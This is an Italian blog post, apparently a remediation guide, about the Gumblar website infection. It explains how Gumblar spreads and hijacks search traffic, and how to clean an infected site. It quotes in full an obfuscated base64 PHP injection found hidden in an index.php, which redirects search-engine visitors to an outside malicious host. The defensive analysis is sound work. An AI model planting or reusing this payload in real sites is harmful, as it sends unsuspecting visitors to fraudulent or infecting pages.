Già diffuso nello scorso marzo, una nuova ondata, di una nuova versione del virus Gumblar sta infettando centinaia di siti.

Effetti di Gumblar:
Attraverso Gumblar i craker puntano a modificare in modo artificioso i risultati di ricerca ottenuti da una ricerca con google e quindi reindirizzare quanti più utenti possibile verso siti infetti o fraudolenti.
Questo si traduce in un serio problema per la reputazione del proprio sito, che vedrebbe indirizzare i propri utenti verso siti di terze persone. La propria immagine potrebbe essere danneggiata indelebilmente se non si corre subito ai ripari.
In aggiunta al danno descritto, ne conseque la probabile cancellazione della propria presenza dagli indici di google.

Come agisce:
Il virus agisce secondo un tipico schema multi-stage. Dapprincipio Gumblar si "intrufola" nei siti sfruttando falle presenti nelle applicazioni web, o più semplicemente attraverso credenziali FTP rubate, magari sfruttando chi ancora utilizza vecchie versioni di dreamweaver per l'upload FTP del sito.
Dopodichè cerca di infettare qualunque macchina che visita il sito, sfruttando soprattutto vecchie versioni di acrobat reader per i PDF, oppure vecchi lettori di Flash non aggiornati, installati sulla macchina del visitatore.

Come eliminarlo:
Debellare questa ultima mutazione del virus, dal proprio sito, è più complesso del precedente, in quanto il codice del virus è criptato e non più in chiaro, cosa che rende più difficile trovare ed eliminare il nuovo virus Gumblar, sia manualmente che con gli odierni antivirus.
Ad esempio su di un sito infetto, in una posizione nascosta, shiftato a destra e fuori dal campo visivo dello schermo, nel file principale index.php è stato trovata trovata questa riga di codice, inserita da Gumblar:

eval(base64_decode("CglpZiAoc3RyaXN0cigkX1NFUlZFUltIVFRQX1JFRkVSRV
JdLCJnb29nbGUiKSkgewoJaWYgKCFzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkV
GRVJFUl0sIi5udSIpIGFuZCAhc3RyaXN0cigkX1NFUlZFUltIVFRQX1JFRkVSRVJd
LCJzaXRlIikgYW5kICFzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sImlu
dXJsIikpewoJCXByZWdfbWF0Y2ggKCIvcVw9KC4qKS8iLCRfU0VSVkVSW0hUV
FBfUkVGRVJFUl0sJGtrKTsKCQlpZiAoc3RyaXN0cigka2tbMV0sIiYiKSkgewoJCQlw
cmVnX21hdGNoICgiLyguKj8pXCYvIiwka2tbMV0sJGtleTIpOwoJCQkka2V5d29
yZD11cmxkZWNvZGUoJGtleTJbMV0pOwoJCX1lbHNlIHsKCQkJJGtleXdvcmQ9d
XJsZGVjb2RlKCRra1sxXSk7CgkJfQoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly
9mZ25mZGZ0aHJ2LmJlZS5wbC8/cT0iLiRrZXl3b3JkKTsKCQlleGl0KCk7Cgl9Cg
p9ZWxzZWlmIChzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sInlhaG9
vIikpIHsKcHJlZ19tYXRjaCAoIi9wXD0oLio/KSYvIiwkX1NFUlZFUltIVFRQX1JFRkV
SRVJdLCRrayk7CgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL2ZnbmZkZnRo
cnYuYmVlLnBsLz9xPSIuJGtrWzFdKTsKCQlleGl0KCk7Cn1lbHNlaWYgKHN0cml
zdHIoJF9TRVJWRVJbSFRUUF9SRUZFUkVSXSwiYmluZyIpKSB7CnByZWdfbWF
0Y2ggKCIvcVw9KC4qPykmLyIsJF9TRVJWRVJbSFRUUF9SRUZFUkVSXSwka2sp
OwoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9mZ25mZGZ0aHJ2LmJlZS5wb
C8/cT0iLiRra1sxXSk7CgkJZXhpdCgpOwp9Cgk="));

Eliminata questa riga di codice i problemi sembrano risolti, ma è sempre meglio sovrascrivere quanti più file possibile, con una versione precedente al virus, facendo particolare attenzione ai file javascript, in quanto potrebbero contenere backdoor, per un possibile ripresentarsi del problema.
Particolarmente consigliata è anche la successiva modifica delle credenziali FTP, in quanto gli autori del virus, molto probabilmente, potrebbero averle rubate.

In questo sistema si è riusciti a eliminare un sito infettato dal virus Gumblar, mentre sulle macchine che hanno visitato il sito, la rimozione è ancora problematica, in quanto tutti gli antivirus, provati al momento, non sembrano riconoscere questa ultima mutazione.